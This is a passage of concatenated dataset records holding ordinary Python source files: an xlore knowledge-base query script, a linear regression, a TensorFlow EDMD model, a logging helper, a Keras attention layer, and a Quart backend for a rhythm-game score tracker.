'wb')\n file.write(content)\n file.close\n #print (response.content)\n","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"227068580","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @author: ‘ShawJoe‘\n @time: 2019/11/14 17:21\n\"\"\"\nfrom utils.common.init_func import Initiator\nfrom utils.settings import experiment_path\nimport requests\nimport traceback\nimport pickle\nimport os\nimport time\nimport json\nimport threading\nfrom remote.engineering.data_tools.SZTools import is_json, read_files_from_dirctory\nfrom remote.engineering.data_tools.SZTools import check_other_language\n\n\n\"\"\"\n========================================================================================================================\nxlore的接口部分\n========================================================================================================================\n\"\"\"\n\n\ndef query_xlore_entity(term):\n \"\"\"获取基本的实体信息\"\"\"\n url = \"http://xxx.xx.xxx.xx:xxxx/query?searchTmp=\" + term\n headers = {\n 'contentType': 'application/x-www-form-urlencoded; charset=UTF-8',\n }\n result = ''\n try:\n req = requests.get(url, headers=headers)\n result = req.text\n except:\n log1.info(traceback.format_exc())\n return result\n\n\ndef query_xlore_uri(uri):\n \"\"\"获取实体的uri信息\"\"\"\n url = \"https://api.xlore.org/query?uri=\" + uri\n headers = {\n 'contentType': 'application/x-www-form-urlencoded; charset=UTF-8',\n }\n result = ''\n try:\n req = requests.get(url, headers=headers)\n result = req.text\n except:\n log1.info(traceback.format_exc())\n return result\n\n\n\"\"\"\n========================================================================================================================\n下面是entity的查询\n========================================================================================================================\n\"\"\"\n\n\ndef combine_entities():\n \"\"\"将上述的分别获取的entities数据进行合并\"\"\"\n list1 = read_files_from_dirctory(experiment_path + \"org/xlore/entities/\")\n dict1 = dict()\n log1.info(str(len(list1)) + \" entities files!\")\n for path in list1:\n dict2 = pickle.load(open(path, \"rb\"))\n for u in dict2:\n if (\"当天访问次数到达上限\" not in dict2[u]) and (is_json(dict2[u])):\n dict1[u] = dict2[u]\n log1.info(str(len(dict1)) + \" entities included in cache file!\")\n with open(experiment_path + \"org/xlore/entity.dict\", 'wb') as f:\n pickle.dump(dict1, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef save_one_entity(uri, thread_name, number):\n \"\"\"保存多线程下每完成n个的结果,包括最后一次完成不超过n个的结果\"\"\"\n name = \"-\" + thread_name + \"-\" + number + \"-\"\n filename1 = experiment_path + \"org/xlore/entities/entity\" + name + \".dict\"\n count1 = 0\n while os.path.exists(filename1): # 当这个文件路径存在的时候,就继续循环,直到给定的文件路径不存在\n count1 += 1\n name += str(count1)\n filename1 = experiment_path + \"org/xlore/entities/entity\" + name + \".dict\"\n with open(filename1, 'wb') as f: # 最终找到的这个是不存在的,直接保存\n pickle.dump(uri, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef multithreading_query_entities(list1, thread_name):\n \"\"\"查询的流程,尤其是注意查询中保存的文件名\"\"\"\n entity = dict()\n count1 = 0\n for u in list1:\n result = query_xlore_entity(u)\n if result != \"\":\n log1.info(thread_name + \" \" + result)\n entity[u] = result\n count1 += 1\n n = 100 # 这里这么处理不容易出错!\n if count1 % n == 0:\n log1.info(count1)\n save_one_entity(entity, thread_name, str(int(count1 / n)))\n entity = dict()\n save_one_entity(entity, thread_name, str(int(count1 / n) + 1))\n log1.info(thread_name + \" End!\")\n\n\ndef multi_query_entity():\n \"\"\"多线程查找entity\"\"\"\n combine_entities() # 先把已经抓取的数据合并到一个文件\n dict1 = pickle.load(open(experiment_path + \"org/xlore/n_gram.dict\", 'rb'))\n filename1 = experiment_path + \"org/xlore/entity.dict\"\n entity = dict()\n if os.path.exists(filename1):\n entity = pickle.load(open(filename1, \"rb\"))\n log1.info(len(entity))\n set1 = set()\n for key in dict1:\n for u in dict1[key]:\n if u not in entity: # 只管不在的时候\n set1.add(u)\n log1.info(str(len(set1)) + \" entities need information!\")\n list1 = list(set1)\n n = 10000 # 每组多少条\n threads = []\n for i in range(0, len(list1), n):\n log1.info(i)\n list2 = list1[i: i + n]\n t = threading.Thread(target=multithreading_query_entities, args=(list2, str(int(i / n))))\n threads.append(t)\n log1.info(len(threads))\n for t in threads:\n t.start()\n log1.info(str(t) + \" start!\")\n\n\n\"\"\"\n========================================================================================================================\n下面是uri的查询\n========================================================================================================================\n\"\"\"\n\n\ndef combine_uris():\n \"\"\"将上述的分别获取的uri数据进行合并\"\"\"\n list1 = read_files_from_dirctory(experiment_path + \"org/xlore/uris/\")\n dict1 = dict()\n log1.info(str(len(list1)) + \" uri files!\")\n for path in list1:\n dict2 = pickle.load(open(path, \"rb\"))\n for u in dict2:\n if (\"当天访问次数到达上限\" not in dict2[u]) and (is_json(dict2[u])):\n dict1[u] = dict2[u]\n log1.info(str(len(dict1)) + \" uris included in cache file!\")\n with open(experiment_path + \"org/xlore/uri.dict\", 'wb') as f:\n pickle.dump(dict1, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef save_one_uri(uri, thread_name, number):\n \"\"\"保存多线程下每完成n个的结果,包括最后一次完成不超过n个的结果\"\"\"\n name = \"-\" + thread_name + \"-\" + number + \"-\"\n filename1 = experiment_path + \"org/xlore/uris/uri\" + name + \".dict\"\n count1 = 0\n while os.path.exists(filename1): # 当这个文件路径存在的时候,就继续循环,直到给定的文件路径不存在\n count1 += 1\n name += str(count1)\n filename1 = experiment_path + \"org/xlore/uris/uri\" + name + \".dict\"\n with open(filename1, 'wb') as f: # 最终找到的这个是不存在的,直接保存\n pickle.dump(uri, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef multithreading_query_uris(list1, thread_name):\n \"\"\"查询的流程,尤其是注意查询中保存的文件名\"\"\"\n uri = dict()\n count1 = 0\n for u in list1:\n result = query_xlore_uri(u)\n if result != \"\":\n log1.info(thread_name + \" \" + result)\n uri[u] = result\n count1 += 1\n n = 100 # 这里这么处理不容易出错!\n if count1 % n == 0:\n log1.info(count1)\n save_one_uri(uri, thread_name, str(int(count1 / n)))\n uri = dict()\n save_one_uri(uri, thread_name, str(int(count1 / n) + 1))\n log1.info(thread_name + \" End!\")\n\n\nuri_set = set() # uri的集合\n\n\ndef traverse_all_uris(obj1):\n \"\"\"遍历属性对象中的所有的uri\"\"\"\n for u in obj1:\n if type(obj1[u]) is dict:\n traverse_all_uris(obj1[u])\n elif type(obj1[u]) is list:\n for m in obj1[u]:\n if type(m) is str:\n uri_set.add('http://xlore.org/instance/'+m)\n elif type(m) is dict:\n traverse_all_uris(m)\n else:\n log1.info(m)\n elif type(obj1[u]) is str:\n if u.lower().strip() == \"uri\":\n uri_set.add(obj1[u])\n else:\n log1.info(u)\n log1.info(obj1[u])\n return uri_set\n\n\ndef multi_query_uri():\n \"\"\"多线程查询,将任务分配到各个多线程,然后进行查询,并保存为文件\"\"\"\n combine_uris() # 先执行一下合并数据,保证uri的数据是最新的\n entity = pickle.load(open(experiment_path + \"org/xlore/entity.dict\", 'rb'))\n uri = pickle.load(open(experiment_path + \"org/xlore/uri.dict\", \"rb\"))\n for key in entity:\n if not check_other_language(key): # 只有英语的才去查询,其他语言的不管\n if is_json(entity[key]):\n traverse_all_uris(json.loads(entity[key]))\n log1.info(str(len(uri_set)) + \" uri_set length!\")\n list1 = []\n for u in uri_set:\n if u not in uri:\n list1.append(u)\n print(len(list1))\n n = 400 # 每组多少条\n threads = []\n for i in range(0, len(list1), n):\n log1.info(i)\n list2 = list1[i: i + n]\n t = threading.Thread(target=multithreading_query_uris, args=(list2, str(int(i / n))))\n threads.append(t)\n log1.info(len(threads))\n for t in threads:\n t.start()\n log1.info(str(t) + \" start!\")\n # t.join()\n\n\ndef check_null_affilations():\n \"\"\"检查并补充affiliation完全找不到对应的entity的\"\"\"\n affiliation = pickle.load(open(experiment_path + \"org/xlore/affiliation.dict\", 'rb'))\n n_gram = pickle.load(open(experiment_path + \"org/xlore/n_gram.dict\", 'rb'))\n entity = pickle.load(open(experiment_path + \"org/xlore/entity.dict\", \"rb\"))\n list1 = []\n count1 = 0\n for a in affiliation:\n if a in n_gram:\n count1 += 1\n flag = False\n for n in n_gram[a]:\n if n in entity:\n obj1 = json.loads(entity[n])\n if len(obj1[\"content\"]) != 0:\n flag = True\n break\n if not flag:\n # print(a, n_gram[a])\n list1.append(a)\n log1.info(count1)\n log1.info(len(list1))\n with open(experiment_path + \"org/xlore/affiliations_re_ngram.dict\", 'wb') as f:\n pickle.dump(list1, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef main(log):\n global log1\n log1 = log\n # multi_query_entity()\n # combine_entities()\n # multi_query_uri()\n # combine_uris()\n check_null_affilations()\n\n\nif __name__ == '__main__':\n init = Initiator(main)\n","sub_path":"query_from_xlore.py","file_name":"query_from_xlore.py","file_ext":"py","file_size_in_byte":10103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"591165635","text":"# Linear regression algorithm\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom pickle import load,dump\n\n# Functions to save files\ndef save_structure(structure,filename):\n file = open(filename,'wb')\n dump(structure,file)\n file.close()\n\ndef load_structure(filename):\n file = open(filename,'rb')\n structure = load(file)\n file.close()\n return structure\n\n# Getting data\ndef read_data(file = 'kc_house_data.csv'):\n f = open(file)\n lines = f.read().split('\\n')\n # Preprocessing data\n X,y = preprocess_data(lines[1:])\n save_structure(X,'X.pkl')\n save_structure(y,'y.pkl')\n return X,y\n\ndef feature_scaling(X):\n features = []\n s = []\n m = []\n new_X = []\n for i in range(18):\n features.append([])\n for x in X:\n for i in range(18):\n print(x,len(x))\n features[i].append(x[i])\n for f in features:\n f_a = np.array(f)\n s.append(np.std(f_a))\n m.append(np.mean(f_a))\n s = np.array(s)\n m = np.array(m)\n # Scaling\n for x in X:\n x_aux = (x - m) / s\n new_X.append(x_aux)\n return np.array(new_X)\n\ndef convert_numbers(line):\n l = []\n for e in line:\n if len(e) > 0:\n if '.' in e:\n l.append(float(e))\n else:\n l.append(int(e))\n else:\n l.append(0)\n return l\n\ndef preprocess_data(lines):\n X = []\n y = []\n for line in lines:\n l = line.split(',')\n if len(l) == 21:\n y.append(l[2]) # Price\n # Drop date and price\n l = l[3:]\n l = convert_numbers(l)\n # Convert in numpy array\n l = np.array(l)\n # Feature scaling\n X.append(l)\n X = np.array(X)\n X = feature_scaling(X)\n y = np.array(y)\n return X,y\n\ndef split_dataset(X,y,limit):\n training = []\n y_tr = []\n y_te = []\n testing = []\n aux_indices = [i for i in range(len(X))]\n print(type(aux_indices))\n random.shuffle(aux_indices)\n for i in aux_indices[:limit]:\n training.append(X[i])\n y_tr.append(y[i])\n for i in aux_indices[limit:]:\n testing.append(X[i])\n y_te.append(y[i])\n return np.array(training), np.array(y_tr), np.array(testing), np.array(y_te)\n\ndef predict(X,params,b):\n predictions = []\n for x in X:\n predictions.append(np.sum(np.transpose(params) * x) + b)\n #for x in X:\n # predictions = np.sum(params * x) +\n predictions = np.array(predictions)\n #print(predictions)\n return predictions\n\ndef loss_function(y,predictions):\n loss = 0.5 * np.mean((y - predictions) ** 2)\n return loss,0.5 * ((y - predictions) ** 2)\n\ndef gradient_descent(X,y,params, b, alpha = 0.1):\n partial_derivatives , partial_b = loss_theta_der(X,y,params,b) , loss_b_der(X,y,params,b)\n params = params - alpha * partial_derivatives\n b = b - alpha * partial_b\n return params,b\n\ndef loss_theta_der(X,y,params,b):\n final_pd = []\n pd = [0 for i in range(18)]\n m = y.size\n for x in X:\n for i in range(len(x)):\n error = (np.sum(params*x) + b) - y[i]\n pd[i] += (1/m) * (error * x[i])\n pd = np.array(pd)\n pd = pd / len(X)\n return pd\n\ndef loss_b_der(X,y,params,b):\n pd = 0\n i = 0\n m = y.size\n for x in X:\n error = (np.sum(params * x) + b) - y[i]\n pd += (1/m) * error\n i += 1\n pd = pd / len(X)\n return pd\n\ndef train():\n total_loss = []\n # Create random parameters\n params = np.random.rand(1,18)\n b = random.random()\n j = 0\n # Load data\n #X,y = read_data()\n X,y = load_structure('X.pkl'), load_structure('y.pkl')\n # Split data\n training, y_tr, testing, y_te = split_dataset(X,y,int(len(X)*0.7))\n # Train model\n while j <= 1000:\n predictions = predict(training,params,b)\n loss = loss_function(y_tr, predictions)\n total_loss.append(loss)\n params, b = gradient_descent(X,y,params,b)\n if j % 50 == 0:\n print('Valor función de costo en la iteración: ',j,' : ',loss)\n j += 1\n save_structure(params,'params.pkl')\n save_structure(b,'b.pkl')\n plt.plot(range(1001), total_loss)\n plt.show()\n\ndef test():\n total_loss = []\n params = load_structure('params.pkl')\n b = load_structure('b.pkl')\n X,y = load_structure('X.pkl'), load_structure('y.pkl')\n # Split data\n training, y_tr, testing, y_te = split_dataset(X,y,int(len(X)*0.7))\n predictions = predict(testing,params,b)\n loss,lo = loss_function(y_te, predictions)\n total_loss.append(loss)\n for l in total_loss:\n print('Error promedio de todas las predicciones en la prediccion ',l)\n for e in range(len(list(lo))):\n print('Valor esperado:',y_te[e],' Valor obtenido: ', predictions[e],' Funcion de coste: ',lo[e])\n\ntest()\n","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"226641368","text":"import numpy as np, pdb, tensorflow as tf\r\n\r\n\r\nclass edmd():\r\n def __init__(self,X,Y,Z,Nstep,mu_x,sd_x,mu_y,sd_y,mu_z,sd_z,**hyper_parameters):\r\n\r\n Ny = Y.get_shape().as_list()[1]\r\n Nz = Z.get_shape().as_list()[1]\r\n\r\n self.Nlayer = hyper_parameters['Nlayer']\r\n self.N0 = hyper_parameters['N0']\r\n self.N1 = hyper_parameters['N1']\r\n self.Nzeta = hyper_parameters['Nzeta']\r\n\r\n self.Z = Z\r\n self.Zn = (Z-mu_z)/sd_z\r\n self.Y = Y\r\n self.Yn = (Y-mu_y)/sd_y\r\n self.Nstep = Nstep\r\n\r\n with tf.variable_scope('encode',reuse=False):\r\n Zeta = self.Zn\r\n units_dist = np.round(np.linspace(self.N0,self.N1,self.Nlayer)).astype(np.int)\r\n for k1 in range(self.Nlayer):\r\n Zeta = tf.layers.dense(Zeta,units=units_dist[k1],kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=1.))\r\n Zeta = tf.nn.tanh(Zeta)\r\n Zeta = tf.layers.dense(Zeta,units=self.Nzeta,kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=1.))\r\n\r\n#\r\n self.A = tf.Variable(1/self.Nzeta/self.Nzeta * tf.random_normal(shape=(self.Nzeta,self.Nzeta),dtype=tf.float32),name='A')\r\n self.C = tf.get_variable(shape=(Ny,self.Nzeta),dtype=tf.float32,regularizer=tf.contrib.layers.l2_regularizer(scale=1.), name='C')\r\n err_y = tf.reduce_mean(tf.square(tf.matmul(Zeta,tf.transpose(self.C)) - self.Yn))\r\n tf.losses.add_loss(err_y)\r\n#\r\n def terminate_cond(itr,zz,err_zeta):\r\n return tf.less(itr,self.Nstep)\r\n def update(itr,zz,err_zeta):\r\n zz_hat = zz + tf.matmul(zz,tf.transpose(self.A))\r\n err_zeta = err_zeta + tf.reduce_mean(tf.square(zz_hat[:-(itr+1),:] - zz[itr+1:,:]))\r\n return (itr+1,zz_hat,err_zeta)\r\n\r\n (_,Zeta_hat,err_zeta) = tf.while_loop(terminate_cond, update, (0,Zeta,0.))\r\n tf.losses.add_loss(err_zeta/tf.cast(self.Nstep,tf.float32)/tf.reduce_mean(tf.square(Zeta)))\r\n\r\n self.Yn_hat = tf.matmul(Zeta_hat, tf.transpose(self.C))\r\n self.Yhat = self.Yn_hat * sd_y + mu_y\r\n\r\nclass trainer():\r\n def __init__(self,graph_skeleton,hyper_parameters):\r\n self.graph_skeleton = graph_skeleton\r\n self.hyper_parameters = hyper_parameters\r\n pass\r\n\r\n def pretrain(self,Xval,Yval,Zval):\r\n return ( np.mean(Xval,axis=0), np.std(Xval,axis=0), np.mean(Yval,axis=0), np.std(Yval,axis=0), np.mean(Zval,axis=0), np.std(Zval,axis=0),)\r\n\r\n def fit(self,Xval,Yval,Zval,Nhrzn,alpha=1e-2,Nitr=2**10,Nfreq_print=2**10,lmbd=1e-4,silent_mode=False):\r\n (Nt,Nx,Ny,Nz) = (Xval.shape[0],Xval.shape[1],Yval.shape[1],Zval.shape[1])\r\n mu_x,sd_x,mu_y,sd_y,mu_z,sd_z = self.pretrain(Xval,Yval,Zval)\r\n with tf.Graph().as_default():\r\n#\r\n itm_nxt = tf.data.Dataset.from_tensor_slices((Xval,Yval,Zval)).batch(Nt).repeat().make_one_shot_iterator().get_next()\r\n#\r\n X = tf.placeholder(shape=(None,Nx),dtype=tf.float32,name='X')\r\n Y = tf.placeholder(shape=(None,Ny),dtype=tf.float32,name='Y')\r\n Z = tf.placeholder(shape=(None,Nz),dtype=tf.float32,name='Z')\r\n Nstep = tf.placeholder(shape=(),dtype=tf.int32,name='Nstep')\r\n self.graph_skeleton(X,Y,Z,Nstep,mu_x,sd_x,mu_y,sd_y,mu_z,sd_z,**self.hyper_parameters)\r\n \r\n loss = tf.reduce_sum(tf.losses.get_losses()) + lmbd * tf.losses.get_regularization_loss()\r\n trainer = tf.train.AdamOptimizer(alpha).minimize(loss)\r\n\r\n with tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n for itr in range(Nitr):\r\n (Xbatch,Ybatch,Zbatch) = sess.run(itm_nxt)\r\n feed_dict = {X: Xbatch, Y: Ybatch, Z: Zbatch, Nstep: Nhrzn}\r\n sess.run(trainer,feed_dict=feed_dict)\r\n\r\n if (itr % Nfreq_print == 0 or itr == (Nitr-1)) and not silent_mode:\r\n loss_val = sess.run(loss, feed_dict = feed_dict)\r\n print('itr: {0:4d}, loss_val: {1:.2e}'.format(itr,loss_val))\r\n\r\n\r\ndef gen_lorenz(Nt = 2**10, dt = 0.1):\r\n from scipy.integrate import ode\r\n\r\n# define Lorenz equation \r\n def f(t, x):\r\n rho = 28.\r\n sigma = 10.\r\n beta = 8./3.\r\n return [\r\n sigma * (x[1] - x[0]),\r\n x[0] * (rho - x[2]) - x[1],\r\n x[0] * x[1] - beta * x[2],\r\n ]\r\n# config parameter\r\n t0 = 0.\r\n x0 = np.ones(3)\r\n\r\n# setup ode-solver\r\n solver = ode(f).set_integrator('dopri5')\r\n solver.set_initial_value(x0,t0)\r\n# solve lorenz eq.\r\n X = np.array([solver.integrate(t0+t) for t in np.arange(Nt)*dt]) \r\n solver.set_initial_value(X[-1,:],t0)\r\n while True:\r\n X = np.array([solver.integrate(t0+t) for t in np.arange(Nt)*dt]) \r\n yield X\r\n t0 = t0 + Nt * dt\r\n","sub_path":"examples/work009.py","file_name":"work009.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"291752298","text":"import logging\nimport os\nimport datetime\n\n\nclass appLog:\n _logger = None\n\n def __new__(cls, *args, **kwargs):\n if cls._logger is None:\n\n logDir=None\n level=None\n if 'logDir' in kwargs.keys():\n logDir = kwargs['logDir']\n del kwargs['logDir']\n print('dirName passed is : ' + logDir)\n else:\n logDir=None\n \n if 'level' in kwargs.keys():\n level = kwargs['level']\n del kwargs['level']\n print('Level passed is : ' + level)\n else:\n logDir=None\n\n\n print(\"Logger new \")\n cls._logger = super().__new__(cls, *args, **kwargs)\n cls._logger = logging.getLogger(\"crumbs\")\n\n if level is None:\n cls._logger.setLevel(logging.ERROR) \n else:\n if level.upper() == 'INFO':\n cls._logger.setLevel(logging.INFO)\n elif level.upper() == 'DEBUG':\n cls._logger.setLevel(logging.DEBUG)\n elif level.upper() == 'WARNING':\n cls._logger.setLevel(logging.WARNING)\n elif level.upper() == 'ERROR':\n cls._logger.setLevel(logging.ERROR)\n else:\n cls._logger.setLevel(logging.ERROR)\n\n formatter = logging.Formatter(\n '%(asctime)s \\t [%(levelname)s | %(filename)s:%(lineno)s] > %(message)s')\n\n now = datetime.datetime.now()\n if logDir != None:\n if not os.path.isdir(logDir):\n os.mkdir(logDir)\n fileHandler = logging.FileHandler(\n logDir + \"/log_\" + now.strftime(\"%Y-%m-%d\")+\".log\")\n fileHandler.setFormatter(formatter)\n cls._logger.addHandler(fileHandler)\n\n streamHandler = logging.StreamHandler()\n streamHandler.setFormatter(formatter)\n cls._logger.addHandler(streamHandler)\n\n return cls._logger\n\n\n# a simple usecase\nif __name__ == \"__main__\":\n logger = appLog()\n logger.info(\"Hello, Logger\")\n logger = appLog()\n logger.debug(\"bug occured\")","sub_path":"appLog/myPkg/myLog.py","file_name":"myLog.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"150446634","text":"from django.apps import AppConfig\nfrom tensorflow.keras.utils import CustomObjectScope\nfrom tensorflow.keras.initializers import glorot_uniform\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras import initializers, regularizers, constraints\nfrom tensorflow.keras.layers import Layer\nfrom django.urls import path\nimport os\n\nclass Attention(Layer):\n\tdef __init__(self, step_dim,\n\t\t\t\t W_regularizer=None, b_regularizer=None,\n\t\t\t\t W_constraint=None, b_constraint=None,\n\t\t\t\t bias=True, **kwargs):\n \n\t\tself.supports_masking = True\n\t\tself.init = initializers.get('glorot_uniform')\n\n\t\tself.W_regularizer = regularizers.get(W_regularizer)\n\t\tself.b_regularizer = regularizers.get(b_regularizer)\n\n\t\tself.W_constraint = constraints.get(W_constraint)\n\t\tself.b_constraint = constraints.get(b_constraint)\n\n\t\tself.bias = bias\n\t\tself.step_dim = step_dim\n\t\tself.features_dim = 0\n\t\tsuper(Attention, self).__init__(**kwargs)\n\n\tdef get_config(self):\n\t\tconfig = super().get_config().copy()\n\t\tconfig.update({\n\t\t\t\t#'supports_masking':self.supports_masking,\n\t\t\t\t#'init':self.init,\n\t\t\t\t'W_regularizer': self.W_regularizer,\n\t\t\t\t'b_regularizer': self.b_regularizer,\n\t\t\t\t'W_constraint': self.W_constraint,\n\t\t\t\t'b_constraint': self.b_constraint,\n\t\t\t\t'bias': self.bias,\n\t\t\t\t'step_dim':self.step_dim,\n\t\t\t\t#'features_dim':self.features_dim,\n\t\t})\n\t\treturn config\n\n\tdef build(self, input_shape):\n\t\tassert len(input_shape) == 3\n\n\t\tself.W = self.add_weight(shape=(input_shape[-1],),\n\t\t\t\t\t\t\t\t initializer=self.init,\n\t\t\t\t\t\t\t\t name='{}_W'.format(self.name),\n\t\t\t\t\t\t\t\t regularizer=self.W_regularizer,\n\t\t\t\t\t\t\t\t constraint=self.W_constraint)\n\t\tself.features_dim = input_shape[-1]\n\n\t\tif self.bias:\n\t\t\tself.b = self.add_weight(shape=(input_shape[1],),\n\t\t\t\t\t\t\t\t\t initializer='zero',\n\t\t\t\t\t\t\t\t\t name='{}_b'.format(self.name),\n\t\t\t\t\t\t\t\t\t regularizer=self.b_regularizer,\n\t\t\t\t\t\t\t\t\t constraint=self.b_constraint)\n\t\telse:\n\t\t\tself.b = None\n\n\t\tself.built = True\n\n\tdef compute_mask(self, input, input_mask=None):\n\t\treturn None\n\n\tdef call(self, x, mask=None):\n\n\t\tfeatures_dim = self.features_dim\n\t\tstep_dim = self.step_dim\n\n\t\teij = K.reshape(K.dot(K.reshape(x, (-1, features_dim)), K.reshape(self.W, (features_dim, 1))), (-1, step_dim))\n\n\t\tif self.bias:\n\t\t\teij += self.b\n\n\t\teij = K.tanh(eij)\n\t\ta = K.exp(eij)\n\t\ta /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())\n\n\t\ta = K.expand_dims(a)\n\t\tweighted_input = x * a\n\t\treturn K.sum(weighted_input, axis=1)\n\n\tdef compute_output_shape(self, input_shape):\n\t\treturn input_shape[0], self.features_dim\n\nclass NamegeneratorConfig(AppConfig):\n\n\tdef __init__(self, model_name):\n\n\t\tself.PRETRAINED_MODEL = \"ImageCaptioning/models/{}\".format(model_name)\n\t\t\n\tdef model(self):\n\t\twith CustomObjectScope({'GlorotUniform': glorot_uniform()}):\n\t\t\tmodel = load_model(self.PRETRAINED_MODEL, \n\t\t\t\tcustom_objects={'Attention':Attention})\n\n\t\treturn model","sub_path":"image_captioning_app/ImageCaptioning/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"272824151","text":"from collections import defaultdict\nfrom functools import cmp_to_key, wraps\nfrom typing import Optional, Dict\n\nimport time\nfrom quart import *\nfrom _jwt import *\nimport asyncio\nfrom models import *\nimport json\nimport hashlib\nimport random\nimport string\nimport math\n\n\ndef md5(v: str):\n return hashlib.md5(v.encode(encoding='UTF-8')).hexdigest()\n\n\ncs_need_update = True\ncs_cache = {}\nmd_cache = music_data()\nmd_map = {}\nfor music in md_cache:\n md_map[music['id']] = music\n\n\ndef get_ds(r: Dict):\n for m in md_cache:\n if m['title'] == r[\"title\"] and m['type'] == r['type']:\n return m[\"ds\"][r[\"level_index\"]]\n return 0\n\n\ndef is_new(r: Dict):\n for m in md_cache:\n if m['title'] == r[\"title\"] and m['type'] == r['type']:\n return m[\"basic_info\"][\"is_new\"]\n return False\n\n\ndef is_new_2(r: Record):\n for m in md_cache:\n if m['title'] == r.title and m['type'] == r.type:\n return m[\"basic_info\"][\"is_new\"]\n return False\n\n\napp = Quart(__name__)\n\nwith open('config.json', encoding='utf-8') as fr:\n config = json.load(fr)\n db_url = config[\"database_url\"]\n jwt_secret = config[\"jwt_secret\"]\n\n\n@app.after_request\ndef cors(environ):\n environ.headers['Access-Control-Allow-Origin'] = '*'\n environ.headers['Access-Control-Allow-Method'] = '*'\n environ.headers['Access-Control-Allow-Headers'] = 'x-requested-with,content-type'\n return environ\n\n\n@app.route(\"/feedback\", methods=['POST'])\nasync def feedback():\n j = await request.get_json()\n FeedBack.insert(j).execute()\n return {\"message\": \"提交成功\"}\n\n\ndef login_required(f):\n @wraps(f)\n async def func(*args, **kwargs):\n try:\n token = decode(request.cookies['jwt_token'])\n except KeyError:\n return {\"status\": \"error\", \"msg\": \"尚未登录\"}, 403\n if token == {}:\n return {\"status\": \"error\", \"msg\": \"尚未登录\"}, 403\n if token['exp'] < ts():\n return {\"status\": \"error\", \"msg\": \"会话过期\"}, 403\n g.username = token['username']\n g.user = Player.get(Player.username == g.username)\n return await f(*args, **kwargs)\n\n return func\n\n\n@app.route(\"/login\", methods=['POST'])\nasync def login():\n j = await request.get_json()\n username = j[\"username\"]\n password = j[\"password\"]\n try:\n user: Player = Player.get(Player.username == username)\n if md5(password + user.salt) == user.password:\n resp = await make_response({\"message\": \"登录成功\"})\n resp.set_cookie('jwt_token', username_encode(\n username), max_age=30 * 86400)\n return resp\n except Exception:\n pass\n return {\n \"errcode\": -3,\n \"message\": \"用户名或密码错误\",\n }, 401\n\n\n@app.route(\"/register\", methods=['POST'])\nasync def register():\n j = await request.get_json()\n player = Player.select().where(Player.username == j[\"username\"])\n if player.exists():\n return {\n \"errcode\": -1,\n \"message\": \"此用户名已存在\",\n }, 400\n salt = ''.join(random.sample(string.ascii_letters + string.digits, 16))\n Player.create(username=j[\"username\"], salt=salt,\n password=md5(j[\"password\"] + salt))\n resp = await make_response({\"message\": \"注册成功\"})\n resp.set_cookie('jwt_token', username_encode(j[\"username\"]))\n return resp\n\n\n@app.route(\"/player/profile\", methods=['GET', 'POST'])\n@login_required\nasync def profile():\n if request.method == 'GET':\n u: Player = g.user\n return {\n \"username\": u.username,\n \"nickname\": u.nickname,\n \"additional_rating\": u.additional_rating,\n \"bind_qq\": u.bind_qq,\n \"privacy\": u.privacy,\n \"plate\": u.plate\n }\n else:\n try:\n obj = await request.json\n # handle plate there.\n if \"plate\" in obj:\n d = obj[\"plate\"]\n version = d[\"version\"]\n plate_type = d[\"plate_type\"]\n verified, plate_label = verify_plate(g.user, version, plate_type)\n if verified:\n g.user.__setattr__(\"plate\", plate_label)\n del obj[\"plate\"]\n for key in obj:\n g.user.__setattr__(key, obj[key])\n g.user.save()\n u: Player = g.user\n return {\n \"username\": u.username,\n \"nickname\": u.nickname,\n \"additional_rating\": u.additional_rating,\n \"bind_qq\": u.bind_qq,\n \"privacy\": u.privacy,\n \"plate\": u.plate\n }\n except Exception:\n return {\n \"message\": \"error\"\n }, 400\n\n\ndef verify_plate(player, version, plate_type) -> Tuple[bool, str]:\n try:\n if version == \"无\":\n return True, \"\"\n plate_name = get_plate_name(version, plate_type)\n if plate_name == \"真将\":\n return False, \"\"\n return True, plate_name\n except Exception:\n return False, \"\"\n\n\n@app.route(\"/player/change_password\", methods=['POST'])\n@login_required\nasync def change_password():\n password = (await request.json)[\"password\"]\n if len(password) >= 30:\n return {\"message\": \"密码不能大于30位\"}, 400\n g.user.password = md5(password + g.user.salt)\n return {\"message\": \"success\"}\n\n\n@app.route(\"/music_data\", methods=['GET'])\nasync def get_music_data():\n resp = await make_response(json.dumps(md_cache))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n\n\n@app.route(\"/player/records\", methods=['GET'])\n@login_required\nasync def get_records():\n r = NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs, newrecord.dxScore, chart.ds as ds, chart.level as level, chart.difficulty as diff, music.type as `type`, music.id as `id`, music.is_new as is_new, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', g.user.id)\n await compute_ra(g.user)\n records = []\n for record in r:\n elem = record_json(record)\n records.append(elem)\n return {\"records\": records, \"username\": g.username, \"additional_rating\": g.user.additional_rating}\n\n\n@app.route(\"/player/test_data\", methods=['GET'])\nasync def get_test_data():\n r = 